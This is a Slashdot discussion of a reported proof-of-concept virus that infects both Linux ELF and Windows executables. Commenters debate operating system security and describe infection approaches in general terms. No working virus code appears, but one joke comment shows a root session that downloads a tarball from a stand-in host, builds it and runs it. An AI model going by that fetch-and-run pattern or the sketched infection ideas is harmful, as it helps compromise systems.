Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Ambidextrous Linux/Windows Virus

CmdrTaco posted more than 8 years ago | from the getting-it-from-both-ends dept.

361

Lam1969 writes "Kaspersky Labs has reported a new proof-of-concept virus that can infect both Windows and Linux systems. It's called Virus.Linux.Bi.a/Virus.Win32.Bi.a and affects ELF binaries and .exe's from windows. SANS has a brief item on the cross-platform virus as well, but no information about a patch or signature yet."

cancel ×

361 comments

Sorry! There are no comments related to the filter you selected.

Wow (-1, Redundant)

RagingFuryBlack (956453) | more than 8 years ago | (#15086767)

FIRST COMMENT Never thought I'd see the day, well, yeah i did. Props to he who did it. Lets see if these types begin to run rampant.

How is it POC? (4, Interesting)

liliafan (454080) | more than 8 years ago | (#15086768)

I guess it is time for me to double check clamav is still updating without any problems on my systems.

In 2001, the sadmind/ISS worm exploited a hole in Sun Microsystems Inc.'s Solaris to infect systems running vulnerable versions of the operating system. Infected systems then scanned for and attacked servers running Microsoft Corp.'s IIS Web server software. That same year, another proof-of-concept virus named Winux infected both Windows and Linux systems.


I am curious about how this is a proof of concept virus if it has been done before surely the concept has already been proven?

Re:How is it POC? (0)

Anonymous Coward | more than 8 years ago | (#15086829)

It's a proof of concept because it doesn't actually do anything once it's infected a system.

Re:How is it POC? (1)

EndlessNameless (673105) | more than 8 years ago | (#15086896)

Anonymous coward bastard beat me to the punch because I wasted time checking to make sure it didn't actually have a payload.

:-p

Re:How is it POC? (4, Funny)

JordanL (886154) | more than 8 years ago | (#15086842)

I am curious about how this is a proof of concept virus if it has been done before surely the concept has already been proven?

It wasn't slashdotted last time?

Re:How is it POC? (5, Informative)

EndlessNameless (673105) | more than 8 years ago | (#15086864)

It seems that the reason it's considered a POC at this point is because it has no real payload. All it does is spread, and not nearly as heinously as Blaster/Welchia/Sasser.

As soon as it gets backdoor or downloader functionality... then it becomes a more serious threat. And really you, me, and the guys at Secunia/SARC/SANS/ISC/etc all know that's where this is headed.

So yes... in the sense of where this particular piece of malware is headed, this is a proof-of-concept. It's a live test of the progagation mechanism. The payload will be dropped into place soon... probably in the next version since this one looks like it's working fine.

Re:How is it POC? (0, Offtopic)

tktk (540564) | more than 8 years ago | (#15087272)

payload...

spread...

backdoor...

This must be the wet dreams of virus writers.

Payload complexity (0)

Anonymous Coward | more than 8 years ago | (#15087307)

But the payload would also need to be "ambidextrous". True, this isn't as hard as making the infection vector cross-platform, but it still requires some finesse.

Good thing Apple just switched to Intel processors, eh?

Re:How is it POC? (0)

Anonymous Coward | more than 8 years ago | (#15087244)

It might be a POC because of how the infection is taking place, not just that it is able to do it.

w32/similie anybody? (0)

Anonymous Coward | more than 8 years ago | (#15087314)

w32/similie, also knowns as linux/similie and metaphor
disassembles, optimizes, obfuscates, and reassembles itself
infects win32 PE and linux ELF formats.

Netcraft confirms... (4, Funny)

Syberghost (10557) | more than 8 years ago | (#15086776)

...BSD just coughed up water and started breathing again.

Re:Netcraft confirms... (0)

Anonymous Coward | more than 8 years ago | (#15087045)

BSD uses ELF binaries also. Assuming you're running on Intel it should work fine there too.

I'll beat you to it.. (4, Funny)

JavaLord (680960) | more than 8 years ago | (#15086779)

100 bi jokes to follow

Re:I'll beat you to it.. (1)

BobVila (592015) | more than 8 years ago | (#15086888)

"I am not an ambi-turner." --Zoolander

Re:I'll beat you to it.. (5, Funny)

zpeterz63 (851922) | more than 8 years ago | (#15087298)

I'm not so sure...it could go either way.

Support (1)

mynickwastaken (690966) | more than 8 years ago | (#15086780)

So Microsoft will need now to support Linux with patches and updates in their effort helping Linux server comunity around virtualization solutions.

Not to worry (1, Interesting)

shaitand (626655) | more than 8 years ago | (#15086784)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Re:Not to worry (5, Funny)

GrumblyStuff (870046) | more than 8 years ago | (#15086831)

Windows users are prepared for viruses...

What bizarro Earth are you from?

Re:Not to worry (1)

sedyn (880034) | more than 8 years ago | (#15086994)

I think he meant that Windows users are "expecting" them.

Re:Not to worry (0)

Anonymous Coward | more than 8 years ago | (#15086855)

Well, deleting all your documents doesns't really seem "minimal".

Sure, mom and pop won't have their harddrives erased, but losing all their photos is probably just as bad as far as they're concerned.

Re:Not to worry (1)

shaitand (626655) | more than 8 years ago | (#15087137)

Doubtful, losing docs just means replacing them. Nowdays even mom and pop have some form of backup, even if it is just photo cd's. Losing the system means money. Either a new computer (if they do not have a tech they call) or calling a tech and paying him $65+/hr to fix their system for them.

As for users more informed than mom and pop, they have routine backups of their home directory at a minimum. They may or may not have backups of their tweaked configs.

Re:Not to worry (1)

squiggleslash (241428) | more than 8 years ago | (#15087240)

"Mom and Pop" back up every photo they get from their camera onto a freshly burnt photo CD? All (or most) "more informed" users run routine backups?

I'd love to live on your planet!

Re:Not to worry (1)

shaitand (626655) | more than 8 years ago | (#15087270)

Yup, mom and pop take the card from their digital camera to walgreens, or cvs, or walmart, etc who then print them out on photo paper and give them a complementary photo cd in place of a negative.

You didn't think mom and pop actually manipulate photos on their computer do you? If they are that advanced then yes, they back up their photos.

Re:Not to worry (5, Informative)

Rosco P. Coltrane (209368) | more than 8 years ago | (#15086880)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of. The reason Linux users don't sweat is because flaws are spotted quickly by many people who read the code, and fixed quickly too. That and people who code open-source tend to produce good code, as a matter of pride.

Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

Re:Not to worry (2, Informative)

sbrown123 (229895) | more than 8 years ago | (#15086970)

Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

Actually most people run with the version of Windows that came installed on their computer. And these accounts are, from the best of my knowledge, always Admin.

Re:Not to worry (3, Insightful)

Creepy (93888) | more than 8 years ago | (#15087242)

Yeah, but even people that know about the "normal" user accounts quickly discover that almost all software written for windows doesn't handle non-admin accounts well. Ever try to install a program just in user space on Windows? If it works at all, you're lucky, and that isn't even scratching the surface of the problems. Got a network password? You can't just switch users to admin (like Linux) or use a sudo password (like Mac) - no, you need to log completely off of your user, then log on as the admin user, install the program, and log off as admin, then log back in as your regular user. Do you have any idea what a MASSIVE pain in the ass that is, especially when I have 20-30 windows open (many are Exceed based X sessions) and am trying to get work done? After 2 months of that and multiple programs that plain wouldn't work if they weren't running as an admin user, I switched back to running exclusively as an admin on Windows.

Re:Not to worry (0)

Anonymous Coward | more than 8 years ago | (#15087294)

-
You can't just switch users to admin (like Linux) or use a sudo password (like Mac) - no, you need to log completely off of your user, then log on as the admin user, install the program, and log off as admin, then log back in as your regular user.
--

WTF?!?
"Run As..?"

I do run as a normal user with the secondary login service running, and this comment doesn't make sense.

Re:Not to worry (1)

clonmult (586283) | more than 8 years ago | (#15087250)

Thankfully I built all the PCs at home; apart from my profile, all the kids/wifes signons are user level. I set them as supervisor on the original setup, but it took me about, er, half an hour, to realise that wasn't too good an idea.

In fact, the first win2k build I did on one of these PCs, I stupidly let it onto the net without A/V or a firewall. That only took about 5 to 10 minutes to get slightly compromised, 1 hour and it was pretty much fubar, but thats not exactly news.

Re:Not to worry (1)

ben there... (946946) | more than 8 years ago | (#15087309)

The account that is setup by default is Admin, but it only takes a quick trip to the Users control panel to add another (limited-access) user.

That said, most Windows users don't know even how to do that.

Re:Not to worry (2, Informative)

shaitand (626655) | more than 8 years ago | (#15087246)

"Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of."

Actually that is pretty much in line with what I have said and does not make me wrong at all.

The system design and development model has led to two things, a shortage of privilage escalation flaws (flaws isn't good enough, they have to allow a user account to gain root under conditions the virus can create) and a short lifespan of any such flaws that exist.

Open source development leads to faster fixes, almost nobody argues this point anymore who is not pushing an agenda. Linux systems are far easier to keep up to date since they are almost entirely open source and free (speech+beer). The result are mechanisms like 'apt-get update; apt-get upgrade' that will update every piece of software on the system, whether os, 3rd party service, or text editor.

This and a strong security model (execute capability must be explicitly enabled by a user who knows how to do it and has permission, default create masks do not make files executable)(users ACTUALLY can only impact files they are supposed to be able to impact). Make the spreading of viruses on linux a non-issue. Flaws are patched faster than the viruses spead, damage is limited to a single user directory and even then only the data created since the last backup. Most clueless users are unable to execute the virus file in the first place because they are unable to set permissions.

grandchild.jpg.exe can never work on linux, period. You have to get the user to open a prompt cd to /home/granny/.email/files then chmod +X grandchild.jpg.exe, THEN ./grandchild.jpg.exe (in linux you have to create a launcher to execute a file in the gui, double-clicking will not work.

"Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA,"

lol, if you say so. I challenge you to browse porn sites for a couple hours using IE under a user account. You will be amazed to find that spyware has spread beyond the one profile every time.

Re:Not to worry (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15087281)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Actually, you're quite wrong.


Actually, he is not.

The design of Linux is simply much better when it comes to security. If (when) a vulnerability is discovered in Linux, the inherent design of Linux usually limits what an exploit can do. Key among all of these is that very, very few things require escalation to system priviliges to work. Most things run in user mode and are fenced off from critical system resources by that very fact. In general, without root access, whatever damage may be done is less than that possible with a Windows exploit.

Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

and the reason it is only a "safer" operating mode? Because so many silly things are wrapped into the OS that even user mode programs need to escalate to system priviliges to do the simplest things. There are a thousand places where you know that an exploit in that area will automatically give you system priviliges! By design, Windows is less secure. Microsoft is making strides (baby steps?) in this area now, but they are discussing and dealing with things that *nix designers dealt with 20 years ago.

I keep hearing the assertion that Linux is just as vulnerable as Windows in regards to viruses. By design, this simply is not true!

Wrong and right. (2, Insightful)

khasim (1285) | more than 8 years ago | (#15086904)

Windows users are prepared for viruses...
Sure they are.
...and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.
Pretty much.

Remember, it isn't about whether a virus exists for a specific platform or not.

It's whether you'll be infected or not.

And that is based upon the infection rate vs the removal rate. A virus that cannot spread faster than it is being removed will die.

Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.

Re:Wrong and right. (2)

heinousjay (683506) | more than 8 years ago | (#15087008)

Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.

To be fair, most Unixish system developers made a number of poor decisions usage-wise in pursuit of "secure" systems.

OS X seems to be the closest to blending the worlds, although it has some interesting foibles all its own. I look forward to the next ten years, because I think everyone is starting to get it all the way around. Uncharacteristically, I'm pretty damn optimistic.

Re:Not to worry (1, Informative)

Anonymous Coward | more than 8 years ago | (#15086914)

On windows, most people (at least, home users) are sitting on admin, most people on linux use this account only for configuration etc.

On root account in *nix, u can do anything with computer.
In windows, this is the same.

Of course, there are bugs (smth like gaining ring0 from user etc) - but they exist on all systems, even bsd sometimes...

Why *nix virus ale such rare?
-these systems are less popular at home
-these systems are used by more experienced user (eg. not clicking on NakedPamela.exe wchich arrived from 235gdsfge4@235cs.com ...)

The basic action of virus - infecting a files - can be done in all systems.
If virus doing that thing will be run on linux, on user account-it will infect all files with write permisions (/home/user ?). Same on windows.

But if u ran it from admin/root account...

The biggest weapon against such thins is to use brain... os is less important (of course if u dont run 9x...).

Re:Not to worry (2, Informative)

halcyon1234 (834388) | more than 8 years ago | (#15087095)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Yes and no. It isn't so much that Linux is a more secure operating system (an argument I won't touch with a 1010 foot pole). It is more that Linux is a more diverse operating system.

If I run Windows XP (perish the thought), and 1000 other people run Windows XP, we are all running the same operating system. Except for a patch or two, we are running the same code with the same holes. A virus that hits one hits us all.

Now, if I run Linux, and 1000 other people run Linux-- well, we aren't all running exactly the same OS. Red Hat, SuSe, live CDs, home brews-- each and every one is slightly different. Top that off with different modules, services, etc running-- and you effectivly have a large number of different operating systems. If a malware exists that uses an explot to propogate, chances are that it isn't going to hit all 1000 of us.

And yes, I know there's a distinction between a virus, a trojan horse, and a worm. But for the sake of argument, the malware I'm talking about is self-propogating and self-executing in some way. Anyone can write a shell script that does rm -rf / and trick at least a couple people into running it.

The real vector that should be a concern for Linux users are cross-platform shares. Let's say you make your Linux box as secure as possible. No holes in any of the services, etc. Well, if you are on a mixed-OS network, and you Samba a Windows drive that is infected-- then you run the risk of being infected. Linux is just as vulnerable as Windows to malware once it has already been executed. So it is much easier to buffer overload the Windows box, and hope the virus gets Samba'd over to a Linux box.

Either that, or we all unplug from the net, power down, and encase our boxes in cement. 100% virus protection (though it would classify as a denial of service...)

Re:Not to worry (4, Insightful)

RzUpAnmsCwrds (262647) | more than 8 years ago | (#15087104)

it is because system design makes their impact minimal

Deleting everything in my home directory is anything but minimal.

Potentially exploting local privilage elevation exploits to get root is anything but minimal.

Infecting software after it has been compiled is anything but minimal.

Using social engineering to get root is anything but minimal. How many users do you know who would enter their superuser password to "get free screensavers"? Too many.

Pretending that you're protected by design to the problem indicates that you don't understand how viruses really work. Guess what? You can run as a non-root user in Windows, too. But you can still do a ton of damage as a normal user. Spam relays and DDOs botnets don't need root access, just the ability to send data over the network. How about modifying your GNOME or KDE menu to point to a fake terminal entry or fake admin tools? How do you know that the "gnome-terminal-emulator" you're now typing your password into (through sudo) isn't actually stealing it?

This is the real world. Attackers are smart, they are motivated by profit (because of the spambot racket), and they have plenty of time to find the next buffer overrun.

Re:Not to worry (0)

Anonymous Coward | more than 8 years ago | (#15087236)

Actually its more that the vast majority of windows users barely have a clue as to how to load a CD much less setup firewalls and keep patched up. People who use Linux are either computer savy to set it up right or they had somebody who is computer savy set it up for them.

If a pop up came up asking for admin priviliges to do something the average user will tell it okay and enter in their password no questions asked. This is Windows biggest weakness... their target audiance. If there was only skilled users then windows computers wouldn't have such a range of problems. I know I've fended off a lot of stuff from my network just through configuring stuff properly with only one or two incidents (and of course it was the idiots with full access through the firewalls clicking on stuff)

Whatever (4, Insightful)

AKAImBatman (238306) | more than 8 years ago | (#15086785)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Cue ominous thunder. (rolls eyes)

All this means is that data communications and storage has reached a point in time where no one (in theory) is going to notice that infected files get 3 or 4 megs chunkier. The virus writers still have to find vectors into these systems. If they can't find convenient vectors, then the ability to produce a fat binary is useless.

What is this need that security researchers have to claim that all systems are equally vulnerable? Are they worried they're going to be out of a job if everyone moves to more secure computing platforms? I mean, really. They should be encouraging mass migrations to other systems, as it diversifies the playing field and theoretically helps everyone remain safer. But I guess that's not their bread and butter.

Re:Whatever (2, Insightful)

CdBee (742846) | more than 8 years ago | (#15086821)

I'll be really impressed when someone comes up with an actual executable binary that contains code to run the appropriate installer on Linux or Windows - a cross-platform version of a Universal Binary

Re:Whatever (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15086832)

The virus writers still have to find vectors into these systems.
Human stupidity has worked so far, I do believe it will continue to work well into the forseeable future.

Re:Whatever (4, Funny)

Tim C (15259) | more than 8 years ago | (#15086838)

If they can't find convenient vectors, then the ability to produce a fat binary is useless.

Unfortunately, there's a very convenient vector indeed sat at the keyboard of the vast majority of PCs.

Re:Whatever (3, Funny)

gEvil (beta) (945888) | more than 8 years ago | (#15086915)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Dammit! And I thought using 70s technology [wikipedia.org] would keep me safe from all these modern-day viruses.

Amazing! (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15086951)

Wow! This virus can infect PET [oldcomputers.net] computers? That really is cross-platform!

which architectures? (3, Interesting)

jon787 (512497) | more than 8 years ago | (#15086788)

The article says the worm was written in assembly and I assume it means x86 assembly. Can the worm infect non-x86 Linux hosts?

Re:which architectures? (1)

MindKata (957167) | more than 8 years ago | (#15086861)

Well its not infected my Vic20 running linux yet ... although I won't know for sure until its finished booting up for the first time in 2009

Re:which architectures? (3, Insightful)

molarmass192 (608071) | more than 8 years ago | (#15087031)

I think you answered your own question in a way, if the host has x86 emulation, then why wouldn't it be able to? That said, it's a long way from a POC to a real live virus. I can write a virus today and claim a POC, nobody has ever said that Linux is immune to viruses. Viruses aren't that complicated. That said, an effective (ie. turn it lose and watch it spread) virus would be very difficult to achieve on Linux precisely because there isn't just one flavor of Linux, running the same binaries, on a single arch ... unlike another well known OS.

Re:which architectures? (1)

PCM2 (4486) | more than 8 years ago | (#15087215)

nobody has ever said that Linux is immune to viruses.
Well... people kinda do make that claim, all the time. They claim it about the Mac, too.

Re:which architectures? (1)

WinterSolstice (223271) | more than 8 years ago | (#15087303)

Having had a Javascript based 'virus' run on Safari, I can tell you that it certainly isn't virus proof. It's just a little different :)

Of course, it's reasonably easy to turn off js - not like ActiveX or something.

-WS

Does this mean.... (5, Funny)

da (93780) | more than 8 years ago | (#15086794)

... linux is ready for the desktop? [ducks]

Re:Does this mean.... (1)

creepynut (933825) | more than 8 years ago | (#15086828)

2006 really IS the year of Linux!

I've been hearing (1)

2names (531755) | more than 8 years ago | (#15087216)

a lot about this "Linux" program.

Will it run on my Windows PC?

Re:Does this mean.... (3, Insightful)

The Ape With No Name (213531) | more than 8 years ago | (#15086922)

No, but it is now ready of proof-of-concept cross-platform FUD.

huh? (0, Redundant)

fusto99 (939313) | more than 8 years ago | (#15086809)

But! But! I thought Linux was immune to viruses? *confused*

ELF huh? (1)

Rosco P. Coltrane (209368) | more than 8 years ago | (#15086812)

Let's just go back to a.out...

The article itself explains why this is so not (1)

mapkinase (958129) | more than 8 years ago | (#15086823)

...interesting.

Read the article:

Application of it is limited on Windows, and nobody is interested in writing viruses for Linux (so far).

The whole thing reminds me of clumsy HP OfficeJet, that magically combines together crappy fax, crappy printer, crappy copier and crappy scanner.

Proof of concept... Like it was challenging before...

Writing viruses for Linux is EASY. Getting them.. (3, Insightful)

Anonymous Coward | more than 8 years ago | (#15087026)

..to spread is the hard part.

How to write a Linux virus.
http://virus.enemy.org/virus-writing-HOWTO/_html/i ndex.html [enemy.org]

There are numerious reasons why this is true.
Reasons include:
GNU/Linux is a minority platform.
GNU/Linux is highly fragmented.
GNU/Linux security is refined and updated often.
GNU/Linux users are more educated.
Windows has numerious security design flaws that promote viruses, that GNU/Linux systems don't have.
Windows has numerious user interface design flaws that promote viruses, that GNU/Linux doesn't have.

Although this WILL CHANGE if certain Pro-GUI factions get their way.

Like having Gnome and KDE user interfaces ignore the traditional Unix permissions for certain types of files... http://thread.gmane.org/gmane.linux.xdg.devel/7014 [gmane.org]

Damn stupid shit.

But as it stands now a combination of social and technical issues keeps Linux users safe.

One example of a flaw in Windows that causes easy transmission of viruses... Executable files are based on their file names, not based on a permission model.

And it's not just 'exe' or 'bat'.. Here is a partial list of executable file extensions in Windows.
ADE - Microsoft Access Project Extension
ADP - Microsoft Access Project
BAS - Visual Basic Class Module
BAT - Batch File
CHM - Compiled HTML Help File
CMD - Windows NT Command Script
COM - MS-DOS Application
CPL - Control Panel Extension
CRT - Security Certificate
DLL - Dynamic Link Library
DO* - Word Documents and Templates
EXE - Application
HLP - Windows Help File
HTA - HTML Applications
INF - Setup Information File
INS - Internet Communication Settings
ISP - Internet Communication Settings
JS - JScript File
JSE - JScript Encoded Script File
LNK - Shortcut
MDB - Microsoft Access Application
MDE - Microsoft Access MDE Database
MSC - Microsoft Common Console Document
MSI - Windows Installer Package
MSP - Windows Installer Patch
MST - Visual Test Source File
OCX - ActiveX Objects
PCD - Photo CD Image
PIF - Shortcut to MS-DOS Program
POT - PowerPoint Templates
PPT - PowerPoint Files
REG - Registration Entries
SCR - Screen Saver
SCT - Windows Script Component
SHB - Document Shortcut File
SHS - Shell Scrap Object
SYS - System Config/Driver
URL - Internet Shortcut (Uniform Resource Locator)
VB - VBScript File
VBE - VBScript Encoded Script File
VBS - VBScript Script File
WSC - Windows Script Component
WSF - Windows Script File
WSH - Windows Scripting Host Settings File
XL* - Excel Files and Templates

Good luck training users not to use those. And the fact that you can launch executable programs by double clicking email attatchments is another huge shitfest of bad designs.

Impressive, but.... (1)

ankhcraft (811009) | more than 8 years ago | (#15086835)

While the article (and the proof of concept) is impressive, you do NOT have to limit yourself to assembly to end up with machine code that is OS neutral. You can write a freestanding C program, and only use assembly to navigate linkage to system calls. The rest of your logic can safely be in C.

Hands tied (1)

digitaldc (879047) | more than 8 years ago | (#15086836)

'It's important for enterprises to be aware of such issues and implement anti-virus tools for protecting non-Windows operating systems if they haven't done so already,' Ullrich said.

Sorry, I got my hands too tied up with the Ambidextrous virus to be implementing any tools right now!

How does it work? (2, Interesting)

Nazo-San (926029) | more than 8 years ago | (#15086843)

I'm kind of curious how it works. You can't just take, say, C++ and simply write the exact same code and it will work in both Windows and Linux. Some of the basics like cout do, but, once you start getting a little more complicated and try to modify files, then it gets tricky. I'm guessing we aren't talking about a Java type thing (supposedly Java has securities in place, though I've never directly tested them -- I do know that it can delete or modify a file though.) They mentioned ELF and Win32 executable binaries, so if it's Java, then that's just a frontend obviously. They wouldn't call it an ambidexterious virus if specific code were written for each OS though, right? The only single thing I can think of is maybe make a system call and run "del so-and-so" which in linux's case would rely on an alias being in place to actually run rm.

Could anyone who knows more programming than I do (which, btw, isn't so hard so feel free to hop in here) give me just an idea of how this is even possible?

You know, suddenly I'm reminded of .hack. In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one, and that one was neither windows nor linux. Ok, it's just a story, but, do you suppose some nut wants to see if they can make this come true in their own way?

Re:How does it work? (3, Funny)

martinultima (832468) | more than 8 years ago | (#15086998)

“In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one”


So, let's try guessing what the single one is... OpenBSD? :-)

Virus Writer 1: Hmm, let's see... first we have to crack the unbreakable encryption on the root password...

Virus Writer 2: No, you idiot! You can't do that until you've found a security vulnerability in the operating system itself!

1: Well, there is the guy running the machine in the first place...

2: Yeah, like anyone would install a secure operating system that requires insane amounts of technical experience and just spontaneously fall for some virus scam thing...

1: I guess you're right then... oh well, back to waiting for another security hole...

Re:How does it work? (1)

Nazo-San (926029) | more than 8 years ago | (#15087106)

No, the OS was an as yet uncreated ALTIMIT OS [wikipedia.org] (gee, I wonder if there was some kind of joke going on with the naming system here? Hmm...) Seriously though, it's just a story.

Oh yeah, speaking of ALTIMIT OS, it's supposed to come out next year according to the story. Get your fingers crossed, it's the one OS more stable than linux and it's good enough to replace linux, windows, mac osx, everything. ^_^

Re:How does it work? (0)

Anonymous Coward | more than 8 years ago | (#15087005)

You obviously must be an MCSE.

Zing!

Re:How does it work? (0)

Anonymous Coward | more than 8 years ago | (#15087069)

My guess is that it's a Windows virus that looks for Linux ELF binaries and modifies them if it can write to them. ELF is the Linux executable file format most widely used. The modified file executable can then do the same thing when used in Linux. It would probably look for critical ELF files executed with "root-permission" so that it can cause as much harm as possible.

Re:How does it work? (0)

Anonymous Coward | more than 8 years ago | (#15087119)

You can't just take, say, C++ and simply write the exact same code and it will work in both Windows and Linux.

Yes you can. Assuming the same processor architecture (eg. x86). The only thing that is different is the object format (PE on Windows, ELF or a.out on Linux/BSD/iOSX). No big deal.

Re:How does it work? (2, Funny)

x2A (858210) | more than 8 years ago | (#15087142)

The linux version comes with WINE ;-)

When it says 'linux and windows', it will no doubt mean linux-x86, which means that java type code isn't required, as the processor instructions are the same (it's apparently written in assembly code). System calls would have to be done differently, as would inserting the code into an elf/exe file to infect it. One way I guess would be to have different entry points into the code, the linux/windows machines would start running at a different point within the code, but when infecting a new file, it would copy both sections of code into it, rather than just the bit that's running. You could in theory make a virus that will spread to many more systems, but each one makes the resulting virus larger.

Re:How does it work? (1)

Nazo-San (926029) | more than 8 years ago | (#15087234)

I understood that. No, you're basically saying the thing I am. Is it really a truly "ambidexterious" virus if it relies on OS specific code for handling things like the actual file modification? It doesn't just get bigger with each new os, it gets massively more complex. Not just the code itself, getting it to actually WORK in each system bypassing securities. What I don't see here is in what way it is any different whatsoever from simply writing two virii, one for each os. That's less messy and easier to maintain anyway.

I don't know, I suppose if you just target linux and windows it might not be so bad, but, I definitely won't call this anything more than just a proof of concept.

Re:How does it work? (1)

x2A (858210) | more than 8 years ago | (#15087308)

The only thing that would make it different from having two seperate viruses*, is that it can jump from one platform to another (eg, over a network or dual boot system), and back etc, so a windows machine behind a linux machine could still be infected and vice versa, when possibly it couldn't otherwise.

(* virus comes from latin, which is why many think you 'virii' it to make it plural. However, the latin word actually refers to a liquid, which would have quantity, not quantities, thus a latin plural is not strictly legal. The english word refers to an entity though, which can have a plural, so 'viruses' is more correct).

Re:How does it work? (1)

morgothan (201770) | more than 8 years ago | (#15087183)

unbreakable encryption on the root password? There is no such thing as unbreakable encryption. It just takes a very long time to break. Like 100 trillion years, but it is not unbreakable. Just as no safe is impenetrable. When you buy a safe, its rating is in time. Meaning that it would take this many hours for a determined person to break into it.

Re:How does it work? (2, Interesting)

alexhs (877055) | more than 8 years ago | (#15087191)

I will give two possibilities :
1. "universal binary" : compile code for each platform you want to infect. That one might even work on other architectures

Code needs :
a. an algorithm to know which OS/Arch an executable is for (and needs to know if a file is an executable in the first place)
b. an algorithm to link the appropriate code part.

You have an Win/x86 trojan. He checks for files and finds an PowerPC/Linux ELF. He adds itself to the end of the file, finds a jump in the original code, reroutes it to the PowerPC/Linux part of the virus code. At the end of the virus code, does the appropriate jump so the original program still works.

2. checks for syscalls :
IA32 code (usually named x86) remains IA32 code, whatever your OS is. The biggest difference lies in syscalls.
have generic code (without syscall) checking what OS is running and set, say, CurrentOS. Each time you need a syscall, do a switch(CurrentOS) and execute the appropriate syscall.

How is it distributed? (1)

paladinwannabe2 (889776) | more than 8 years ago | (#15086847)

The article is sparse on details as to how the virus is distributed. It sounds like the virus is something that you actually have to run, so you won't pick it up just by visiting a website or reading an email. Anyone know more details about this?

Re:How is it distributed? (0)

Anonymous Coward | more than 8 years ago | (#15086913)

It is only proof of concept. Thus no delivery mechinism as of yet.

Re:How is it distributed? (5, Funny)

adnonsense (826530) | more than 8 years ago | (#15087082)

I have reverse-engineered the virus and discovered an insiduous distribution mechanism:

root# wget http://warez.example.com/Virus.Linux.Bi.a.tgz
root# tar xzf Virus.Linux.Bi.a.tgz
root# cd Virus.Linux.Bi.a
root# ./configure --prefix=/usr/local/virii --with-natalie-portman=hot-grits --with-beowulf-cluster=yes
root# make && make install
root# PATH=$PATH:/usr/local/virii/bin
root# rehash
root# pwn3d &

I, for one (4, Funny)

sprag (38460) | more than 8 years ago | (#15086851)

welcome our new cross-platform proof-of-concept viral overlords.

Its almost like playing buzzword bingo.

Reactions: (4, Insightful)

Guppy06 (410832) | more than 8 years ago | (#15086872)

  1. Linux and Win32? W00t, my WfW3.11 box is invincible!
  2. So... why can't application developers do this?

Re:Reactions: (1)

gnud (934243) | more than 8 years ago | (#15086938)

1. Surprise, your 3.11 box is insignificant! 2. I'm guessing the virus does not do gui stuff.

Re:Reactions: (1)

Nazo-San (926029) | more than 8 years ago | (#15087054)

If that were true, the Win3.1 system is almost as vulnerable as any Win9x system. I don't think the article said it was specific to NT? It may be that it is, but, I'm guessing that it doesn't do anything high level enough to actually need to be specific to NT over 9x. I think you can't just compile it for Win9x and it run in Win3.1, but, I know you were supposed to be able to run 32-bit applications in Win3.1 (you may have needed an extra thing installed, I don't remember for certain, but, I remember I did once run something 32-bit in Win3.1 I think mainly for testing (it didn't even need that much memory anyway, so no big deal at the time. I think I had 16MB of ram at the time in fact.)

BTW, he was joking about Win3.1. I don't think anyone seriously uses that anymore. Heck, I tried it a little while back for nostalgia's sake, but, even the nostalgia factor didn't keep it installed on the system for more than a couple of days or so.

Re:Reactions: (2, Funny)

redalien (711170) | more than 8 years ago | (#15087256)

It was called Win32S, and actually worked amazingly well. I only ever had 1 programme not work, and that was a quiz programme called "You don't know Jack". This americanism confused me greatly, and I was very annoyed that I couldn't run it and find out who Jack was.

Re:Reactions: (1)

x2A (858210) | more than 8 years ago | (#15087203)

1. Linux and Win32? W00t, my WfW3.11 box is invincible!

Except to the insults on slashdot!

2. So... why can't application developers do this?

What, make their software infect all the your exe and elf files on your system? I can see it pissing a lot of people off, which is probably why they don't do it.

3. Profit!

Re:Reactions: (1)

Bromskloss (750445) | more than 8 years ago | (#15087210)

my WfW3.11 box is invincible!
Whoa, World for Warcraft 3.11 is out already!?

Limited to ASM? (2, Insightful)

neoshroom (324937) | more than 8 years ago | (#15086876)

"Writing a cross-platform worm is difficult because it limits you to functions that are available on both operating systems," Ullrich said. "You have to also code the virus in assembly to make it work without relying on any OS-specific function," he said.

This isn't actually quite true, it is merely one way of doing so. You could easily write a virus that uses tons of API and platform specific stuff, but contains a generic detection mechanism at the beginning of its execution and then forks between two pieces of code. One portion contains code specific to Windows and another code specific to Linux. Apart from the generic platform discovery code upon execution it would be like any other platform specific virus. I'm actually surprized this is the first, at least publicized, detection of such a virus.

__
Write My Essay [elephantessays.com]

Re:Limited to ASM? (4, Informative)

x2A (858210) | more than 8 years ago | (#15087239)

It's not the first, I recall one before. And you don't even need detection code, you just write a different entry point address into the elf header as you would the exe header. You can have two different payloads, and two different copy mechanisms, as long as both copy both, not just themselves. In fact, there's no reason to stick to just 2. You can have a single virus that spreads across platforms/architectures, it just makes it bigger and easier to spot.

Re:Limited to ASM? (1)

